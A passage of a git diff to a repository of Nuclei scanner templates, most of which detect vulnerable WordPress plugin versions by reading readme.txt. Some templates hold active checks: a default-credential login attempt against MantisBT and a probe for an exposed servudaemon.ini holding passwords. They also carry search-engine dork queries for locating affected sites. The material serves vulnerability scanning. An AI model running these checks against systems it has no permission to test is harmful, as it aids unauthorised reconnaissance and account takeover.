./poc/sql/CVE-2024-37100-bdbf132f7ff4f19dce18f2679e9d4a08.yaml @@ -103124,6 +103214,7 @@ ./poc/sql/CVE-2024-4532-babdc5829ad7d6c3dddb2e098b147720.yaml ./poc/sql/CVE-2024-4546-a45229e1e3c14d5bd8397e4b9cc875db.yaml ./poc/sql/CVE-2024-4551-f0f0671db838036fd9c1ce2adf4e33a0.yaml +./poc/sql/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml ./poc/sql/CVE-2024-4623-a8fcd9d3aa8bba088dbbf516d83b5b4c.yaml ./poc/sql/CVE-2024-4630-dbe3ad2276d25849b33dd8a451ea349b.yaml ./poc/sql/CVE-2024-4643-1f0dfc263007df26c451c6afe8188db9.yaml @@ -103170,6 +103261,7 @@ ./poc/sql/CVE-2024-5541-eb1e7c9db560dc98453641b8dc95474b.yaml ./poc/sql/CVE-2024-5583-4bf5df60bad728c4d77db23548e2e248.yaml ./poc/sql/CVE-2024-5605-230eb371b3dbca7b916f8802ac8add36.yaml +./poc/sql/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml ./poc/sql/CVE-2024-5638-6b2bb507df8cc9b0ced9db594103e225.yaml ./poc/sql/CVE-2024-5713-29d3865418038fd895d3db73e7b26fc0.yaml ./poc/sql/CVE-2024-5724-4ec214434fd2f861667853a0711db2bf.yaml @@ -103178,6 +103270,7 @@ ./poc/sql/CVE-2024-5792-ddbb2190cd756b3ae01bb38e63370a72.yaml ./poc/sql/CVE-2024-5819-afdbf1b8ef18474cdef555c0be87fd78.yaml ./poc/sql/CVE-2024-5858-8478fd188db095b50a710c21aa308605.yaml +./poc/sql/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml ./poc/sql/CVE-2024-5937-874f8885fda0d2de8d0adb8690c59d59.yaml ./poc/sql/CVE-2024-5938-b9941f631d85ad0f37a1730dbd393bec.yaml ./poc/sql/CVE-2024-5942-bed1093c2baf9801f9d40df90c0dcdbc.yaml @@ -103215,6 +103308,7 @@ ./poc/sql/CVE-2024-6718-248ea11ff135db64e4802002a7613eb0.yaml ./poc/sql/CVE-2024-6752-ec708cb28101def2a2ec6f09281ef7db.yaml ./poc/sql/CVE-2024-6797-b6db90f6651f67f2c92f688656bcca15.yaml +./poc/sql/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml ./poc/sql/CVE-2024-6928-66d36a40cf2172db26cce7deee6ee28d.yaml ./poc/sql/CVE-2024-6929-a777b884d41a272d1f526ce0db30cd1d.yaml ./poc/sql/CVE-2024-7027-90534f21ba7ac35c6aefb4db06d95b2d.yaml @@ -103232,10 +103326,12 @@ ./poc/sql/CVE-2024-7817-49083f3d0aeb0ae2badbca3840ad0f3c.yaml ./poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml ./poc/sql/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml +./poc/sql/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml ./poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml ./poc/sql/CVE-2024-8104-ce7e2be47ca5e025bb553db2616e0460.yaml ./poc/sql/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml ./poc/sql/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml +./poc/sql/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml ./poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/sql/CVE-2024-8325-11327d2b9e1fdbe3b095a728909b8615.yaml ./poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml @@ -103891,6 +103987,7 @@ ./poc/sql/beescms_v3-login-sql-injection.yaml ./poc/sql/beescms_v4-login-sqli.yaml ./poc/sql/before-and-after-product-images-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/betheme-2738eb196d5cf7002027db186214d929.yaml ./poc/sql/betheme-71b13c5e1eda36a90193edb1421a40a0.yaml ./poc/sql/betheme-7d3ec953d47edbc8ce6f4ed6c46f8af2.yaml ./poc/sql/betheme-d02f3193d607dbca23dbb76cdd400429.yaml @@ -104100,6 +104197,7 @@ ./poc/sql/card-oracle-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/cardealer-f36dfc31a31a830daf051a2485d66db9.yaml ./poc/sql/cardoza-wordpress-poll-38d62d0c5d6ffb83660279b8431dbf0a.yaml +./poc/sql/carousel-slider-2fe9ad7647c04f89fbdba50824aa349b.yaml ./poc/sql/cart-link-for-woocommerce-7714e46aadb6af1daf94d807dc766b46.yaml ./poc/sql/cart66-lite-fd0ff818ca0522fefd55b57edbbb7623.yaml ./poc/sql/cartoon-url-6477bf18cad6c823db485408d49b337b.yaml @@ -104923,6 +105021,7 @@ ./poc/sql/ewww-image-optimizer-b9efeda8e09633d025bca4d34db28329.yaml ./poc/sql/exchange-addon-paypal-pro-6459e7fdb142b3e7fda28346cfeee4cf.yaml ./poc/sql/exclusive-addons-for-elementor-4e0b3f5938dbbcb7b6d25d649232d602.yaml +./poc/sql/exit-notifier-b42fe76d662d705db55d79a49ebb4329.yaml ./poc/sql/exmage-wp-image-links-8d79d83518fbf44f7d865eaecb121db1.yaml ./poc/sql/expire-tags-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/export-job-portal-management-system-sql-injection.yaml @@ -105136,6 +105235,7 @@ ./poc/sql/funnelforms-free-82012b3f67d1609303680fdb66fee981.yaml ./poc/sql/fuse-social-floating-sidebar-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/fushion-theme-f5f50455a3255db857081d4e726d3048.yaml +./poc/sql/fusion-builder-fde4dbc1536b247a205ddac8a2a684c9.yaml ./poc/sql/fusionspan-impexium-single-sign-on-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/fv-wordpress-flowplayer-16a8cdccb2f9e3068f83db4e3063e970.yaml ./poc/sql/fv-wordpress-flowplayer-8183200dbea3535a1918a4d91e3968a5.yaml @@ -105264,6 +105364,7 @@ ./poc/sql/grid-plus-077017011efa2b3f2430be7b8cdba8ec.yaml ./poc/sql/groundhogg-5cadbdd28bed6226920918f2d757bd2a.yaml ./poc/sql/gs-facebook-comments-81db78745401f1401bd51653102e0d12.yaml +./poc/sql/gs-logo-slider-6788144065d375977e89ac972dbadb54.yaml ./poc/sql/gs-logo-slider-c92e9f2db8e6ee93e464cb9a2fb6ae41.yaml ./poc/sql/gs-pinterest-portfolio-0dbb70674c2246972063f503b39edbdc.yaml ./poc/sql/gs-pinterest-portfolio-f2a044c46a36110d5e1ed7a24c4dbe0a.yaml @@ -105627,6 +105728,7 @@ ./poc/sql/learnpress-78fcb432956d8619a95c109adb53f6cb.yaml ./poc/sql/learnpress-8edba280e7a9fce26832b1657089d2d6.yaml ./poc/sql/learnpress-cff8affa6bcd5a83a59d60fa8af94dbb.yaml +./poc/sql/leira-roles-270e3fdb06570cfef003e572f24bd104.yaml ./poc/sql/letsrecover-woocommerce-abandoned-cart-fdbc8dce3a6dd8419dc7c5c3b97075c0.yaml ./poc/sql/letterpress-db74e52300ad937a8b884324069429c8.yaml ./poc/sql/levelfourstorefront-3ad05ad572cc7dbd0e29978f399c8e16.yaml @@ -105977,6 +106079,7 @@ ./poc/sql/ninja-forms-9c13bdb7049f6f5d5ad6e024cf5cd6bb.yaml ./poc/sql/ninja-forms-a156cc503d95e44ca5feb19fb22d90db.yaml ./poc/sql/ninja-forms-db5cbbe2e62074df44cb5125a2b60b42.yaml +./poc/sql/ninja-forms-dbba8836e7c63cb37d729f0bede3c08c.yaml ./poc/sql/ninja-tables-8fa7023464934a870d2201236db1fe4b.yaml ./poc/sql/ninjalibs-ses-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/nitek-carousel-cool-transitions-6477bf18cad6c823db485408d49b337b.yaml @@ -106801,6 +106904,7 @@ ./poc/sql/smart-variations-images-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/smartbi-db2-params-rce.yaml ./poc/sql/smartideo-25529e788ad3d7f0507db0472772a1c9.yaml +./poc/sql/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml ./poc/sql/sms_page_SQL.yaml ./poc/sql/smtp-mail-20dbd55968ba0f002b255462ae0c62d1.yaml ./poc/sql/smtp-mail-683425d6ce9e53ca25eaadb1963205f4.yaml @@ -107177,6 +107281,7 @@ ./poc/sql/tripay-payment-gateway-72213a7c863bdfaf87d000676e48db94.yaml ./poc/sql/tripetto-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/tripetto-b23eaee9ccbe3b3a04bf6fd27744db42.yaml +./poc/sql/triton-lite-56db9447fe27bdd7df2cf18aa839dda3.yaml ./poc/sql/truebooker-appointment-booking-cd8e92fdb69812669db7332a5b930373.yaml ./poc/sql/trust-form-dae8041acebdb629070e4d9ea0b759eb.yaml ./poc/sql/trust-payments-gateway-3ds2-d008e1d31f091b729abd1db5951d088c.yaml @@ -111586,6 +111691,7 @@ ./poc/web/web-control-panel.yaml ./poc/web/web-crossing-server.yaml ./poc/web/web-data-administrator.yaml +./poc/web/web-directory-free-2b58d77210c6a77720f0b93f6e969f27.yaml ./poc/web/web-directory-free-3fceffa0b8bd31b6154b8ede4f15579f.yaml ./poc/web/web-directory-free-acbd91edc6e3df1a9ab069d10efdd31f.yaml ./poc/web/web-directory-free-d197c71f58c2e43a1d446a0435b27bca.yaml @@ -113560,6 +113666,7 @@ ./poc/wordpress/slicewp-4653caf7fb563871a4a373a274fc0f86.yaml ./poc/wordpress/slicewp-68a7286dee82e01e0686b3618dc6461d.yaml ./poc/wordpress/slicewp-8bd7001db8b7e33a521a11f5cac60234.yaml +./poc/wordpress/slicewp-93f0a57183ff79e378986791039cd4c0.yaml ./poc/wordpress/slicewp-a19fee43a6b0b996c7bac52248a26275.yaml ./poc/wordpress/slicewp-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/slicewp-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -113580,6 +113687,7 @@ ./poc/wordpress/smartmag-responsive-retina-wordpress-magazine.yaml ./poc/wordpress/smartsearchwp-22ceafab668da8aceedda2211b679417.yaml ./poc/wordpress/smartsearchwp-88af2e7689c887d198ef309920089cf6.yaml +./poc/wordpress/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml ./poc/wordpress/smartsearchwp.yaml ./poc/wordpress/smarty-for-wordpress-2340c18a81723d13392a22e21155244a.yaml ./poc/wordpress/smarty-for-wordpress-bde5200861c2ea59ba4fd235f0f4f7d8.yaml @@ -115748,6 +115856,7 @@ ./poc/wordpress/wp-editor-8747d7af8402edcfbcb6230e90d25140.yaml ./poc/wordpress/wp-editor-c489d3bdfb8499c978184619111131c4.yaml ./poc/wordpress/wp-editor-da74f42ca762c5729aa2b94eb0fd7ce9.yaml +./poc/wordpress/wp-editor-e1f8a5df86e1e39a02f9abdc9b9b624e.yaml ./poc/wordpress/wp-editor.yaml ./poc/wordpress/wp-editormd-5039ee7a3e48f78cb73e586042e681ee.yaml ./poc/wordpress/wp-editormd.yaml @@ -117986,6 +118095,7 @@ ./poc/wordpress/wp-sierra-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/wordpress/wp-sierra.yaml ./poc/wordpress/wp-simple-booking-calendar-1a4a65ff6c4e9e7b39b22ebb17162091.yaml +./poc/wordpress/wp-simple-booking-calendar-34f4a1a718c60d12e4d96b373b4a77ce.yaml ./poc/wordpress/wp-simple-booking-calendar-3d2ac451b259c3277d2d54d206f263ea.yaml ./poc/wordpress/wp-simple-booking-calendar.yaml ./poc/wordpress/wp-simple-events-2f6275948d172c97185bde6f2cd461a7.yaml @@ -118487,6 +118597,7 @@ ./poc/wordpress/wp-tell-a-friend-popup-form.yaml ./poc/wordpress/wp-terms-popup-1cce07d804e627ef58aa1266e2d0d645.yaml ./poc/wordpress/wp-terms-popup.yaml +./poc/wordpress/wp-test-email-d972e6fc6b9fbf14ec77704417abbfe0.yaml ./poc/wordpress/wp-testimonial-widget-29c6802974791f322cc3fd42a505c031.yaml ./poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml ./poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml @@ -118641,6 +118752,7 @@ ./poc/wordpress/wp-ulike-2bb7f513b632904f2fe7b431054accce.yaml ./poc/wordpress/wp-ulike-39475117489d93030cc8ecbcc85522df.yaml ./poc/wordpress/wp-ulike-56294f850b6deb68875689873af4fb37.yaml +./poc/wordpress/wp-ulike-5dc71d194ef6b07e577c2653b00da476.yaml ./poc/wordpress/wp-ulike-65dbd1cc39026e555d37756af24e3e40.yaml ./poc/wordpress/wp-ulike-7683f0a4fc4d71bd2490e49874d1303b.yaml ./poc/wordpress/wp-ulike-973866fe97ccfd67222e0c88aee0a279.yaml @@ -119172,6 +119284,7 @@ ./poc/wordpress/wpcf7-redirect-abd6bd305348b8021e7310c8ca2e06d0.yaml ./poc/wordpress/wpcf7-redirect-c8c16c617550c7db690dbef59bc3b26a.yaml ./poc/wordpress/wpcf7-redirect.yaml +./poc/wordpress/wpcodefactory-helper-3e174cda9ee64e9ecefee07080044ff5.yaml ./poc/wordpress/wpcodefactory-helper-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wpcodefactory-helper-dc849e6722bcf19c8126dfe6335d7c79.yaml ./poc/wordpress/wpcodefactory-helper.yaml diff --git a/poc/adobe/servudaemon-ini.yaml b/poc/adobe/servudaemon-ini.yaml index f049976e9b..f3090cefa8 100644 --- a/poc/adobe/servudaemon-ini.yaml +++ b/poc/adobe/servudaemon-ini.yaml @@ -1,21 +1,21 @@ -id: servudaemon-ini - -info: - name: servudaemon-ini - author: NoRed0x - severity: high - description: This Nuclei template checks for sensitive data disclosure vulnerabilities at the servudaemon.ini file - tags: config, secrets, leaks - -requests: - - method: GET - path: - - '{{BaseURL}}/servudaemon.ini' - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - 'LocalSetupPassword' - - '[GLOBAL]' - - 'LogFileSystemMes' +id: servudaemon-ini + +info: + name: servudaemon-ini + author: NoRed0x + severity: high + description: This Nuclei template checks for sensitive data disclosure vulnerabilities at the servudaemon.ini file + tags: config, secrets, leaks + +requests: + - method: GET + path: + - '{{BaseURL}}/servudaemon.ini' + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - 'LocalSetupPassword' + - '[GLOBAL]' + - 'LogFileSystemMes' diff --git a/poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml b/poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml new file mode 100644 index 0000000000..2ea00b5737 --- /dev/null +++ b/poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml @@ -0,0 +1,59 @@ +id: mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf + +info: + name: > + MStore API – Create Native Android & iOS Apps On The Cloud <= 4.15.3 - Unauthorized User Registration + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/59c5b6e7-74b0-430d-8b4a-5a42220f3ec9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mstore-api/" + google-query: inurl:"/wp-content/plugins/mstore-api/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mstore-api,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mstore-api" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.15.3') \ No newline at end of file diff --git a/poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml b/poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml new file mode 100644 index 0000000000..81d9e79112 --- /dev/null +++ b/poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml @@ -0,0 +1,59 @@ +id: mstore-api-5aa30296a4f0ae648270a4e74d17b635 + +info: + name: > + MStore API – Create Native Android & iOS Apps On The Cloud <= 4.15.3 - Authenticated (Subscriber+) Limited Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fe3834a6-a6f5-4cc7-951e-a6ada6346b07?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mstore-api/" + google-query: inurl:"/wp-content/plugins/mstore-api/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mstore-api,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mstore-api" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.15.3') \ No newline at end of file diff --git a/poc/auth/Mantis-Default_login.yaml b/poc/auth/Mantis-Default_login.yaml index 58cb63c201..4ffeb88644 100644 --- a/poc/auth/Mantis-Default_login.yaml +++ b/poc/auth/Mantis-Default_login.yaml @@ -1,4 +1,5 @@ id: mantisbt-default-credential + info: name: MantisBT Default Admin Login author: For3stCo1d @@ -13,6 +14,7 @@ info: cvss-score: 8.3 cwe-id: CWE-522 tags: mantisbt,default-login + requests: - raw: - | @@ -21,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded return=index.php&username={{user}}&password={{pass}} + attack: pitchfork payloads: user: - administrator pass: - root + matchers-condition: and matchers: - type: dsl @@ -34,6 +38,7 @@ requests: - contains(tolower(all_headers), 'mantis_secure_session') - contains(tolower(all_headers), 'mantis_string_cookie') condition: and + - type: status status: - 302 diff --git a/poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml b/poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml new file mode 100644 index 0000000000..12f1b82a3f --- /dev/null +++ b/poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml @@ -0,0 +1,59 @@ +id: login-screen-manager-d96b919b70e327f92b0707dadc93f77b + +info: + name: > + Login Screen Manager <= 3.5.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/288db6ba-5d6c-448d-85c5-f9a19a9391c0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/login-screen-manager/" + google-query: inurl:"/wp-content/plugins/login-screen-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,login-screen-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-screen-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-screen-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.2') \ No newline at end of file diff --git a/poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml b/poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml new file mode 100644 index 0000000000..1d04c93c98 --- /dev/null +++ b/poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml @@ -0,0 +1,59 @@ +id: sign-up-sheets-2274954363ea101c579ff78257df6249 + +info: + name: > + Sign-up Sheets <= 2.2.12 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba06e298-308d-4378-96b8-5ac4e7cc63c0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/sign-up-sheets/" + google-query: inurl:"/wp-content/plugins/sign-up-sheets/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,sign-up-sheets,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sign-up-sheets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sign-up-sheets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.12') \ No newline at end of file diff --git a/poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml b/poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml new file mode 100644 index 0000000000..7308d44473 --- /dev/null +++ b/poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml @@ -0,0 +1,59 @@ +id: yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96 + +info: + name: > + YITH Custom Login <= 1.7.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0828a4a4-2dd5-4dff-8563-c81d6b24b949?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/yith-custom-login/" + google-query: inurl:"/wp-content/plugins/yith-custom-login/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,yith-custom-login,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/yith-custom-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "yith-custom-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.3') \ No newline at end of file diff --git a/poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml b/poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml new file mode 100644 index 0000000000..0fe58e74b6 --- /dev/null +++ b/poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-2446-12288e54ea2799c2827efda4c629c56e + +info: + name: > + WP Editor <= 1.2.9 - Authenticated (Admin+) PHAR Deserialization + author: topscoder + severity: low + description: > + The WP Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'current_theme_root' parameter in versions up to, and including 1.2.9. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f3555702-4427-4569-8fd6-f84113593e9d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-2446 + metadata: + fofa-query: "wp-content/plugins/wp-editor/" + google-query: inurl:"/wp-content/plugins/wp-editor/" + shodan-query: 'vuln:CVE-2022-2446' + tags: cve,wordpress,wp-plugin,wp-editor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-editor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-editor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.9') \ No newline at end of file diff --git a/poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml b/poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml new file mode 100644 index 0000000000..e41c148c32 --- /dev/null +++ b/poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-40068-23426c249d4590c183980f57ce680dee + +info: + name: > + Advanced Custom Fields <= 6.3.5 - Authenticated Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51178e18-ae8b-4a7f-974d-23346a8dbc52?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: CVE-2023-40068 + metadata: + fofa-query: "wp-content/plugins/UNKNOWN-CVE-2023-40068-1/" + google-query: inurl:"/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/" + shodan-query: 'vuln:CVE-2023-40068' + tags: cve,wordpress,wp-plugin,UNKNOWN-CVE-2023-40068-1,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "UNKNOWN-CVE-2023-40068-1" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml b/poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml new file mode 100644 index 0000000000..41f54160b7 --- /dev/null +++ b/poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b + +info: + name: > + Login Screen Manager <= 3.5.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Login Screen Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.2. This is due to missing or incorrect nonce validation on the cwlsm_options_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/288db6ba-5d6c-448d-85c5-f9a19a9391c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-47182 + metadata: + fofa-query: "wp-content/plugins/login-screen-manager/" + google-query: inurl:"/wp-content/plugins/login-screen-manager/" + shodan-query: 'vuln:CVE-2023-47182' + tags: cve,wordpress,wp-plugin,login-screen-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-screen-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-screen-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml b/poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml new file mode 100644 index 0000000000..6b1a713e63 --- /dev/null +++ b/poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07 + +info: + name: > + Web Directory Free <= 1.7.2 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + The Web Directory Free plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.7.2 via the w2dc_isTemplate() function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d80ab1a4-19f9-4fea-87b4-1d2ba465e860?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-3673 + metadata: + fofa-query: "wp-content/plugins/web-directory-free/" + google-query: inurl:"/wp-content/plugins/web-directory-free/" + shodan-query: 